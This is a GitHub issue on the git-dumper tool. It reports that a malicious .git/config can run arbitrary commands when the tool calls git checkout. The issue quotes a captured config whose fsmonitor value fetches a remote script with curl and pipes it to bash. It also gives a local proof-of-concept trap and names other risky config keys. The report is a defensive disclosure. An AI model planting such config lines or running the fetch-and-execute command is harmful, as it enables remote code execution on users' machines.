search

arthaud / git-dumper

A tool to dump a git repository from a website
MIT License
1.89k stars 255 forks source link

Security risk - RCE in `.git/config` #42

Open ZanyMonk opened 9 months ago

ZanyMonk commented 9 months ago

I recently came across a weird .git/config file against which this tool is totally vulnerable.

[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
        fsmonitor = "bash -c 'curl -s https://[redacted]/static/img/[redacted].js | bash'"
[user]
        email = [redacted]

The command set as fsmonitor value gets executed when issuing several git commands, including the final git checkout . made by git-dumper to rebuild the worktree.

Here is a simple method to create such git-trap locally to test its behavior:

mkdir /tmp/evilgit
cd /tmp/evilgit
git init
cat >> .git/config <<EOF
        fsmonitor = "sh -c 'xcalc &' | echo 0"
EOF

# Trigger the trap
git checkout .

There are several other configuration variables that could be used to achieve similar results (sshCommand, askPass, editor, pager and there could be more).

Solve the problem

A way to protect ourselves from this kind of thing is to check the config file for dangerous configuration variables (which everyone should do manually anyways) and comment them automatically before running any git command.

arthaud commented 9 months ago

Thanks for the report. This is indeed a known problem, as mentioned in the README.

Agreed with your proposal. An easy fix would be to comment out the .git/config before runing any git command. Feel free to submit a PR :)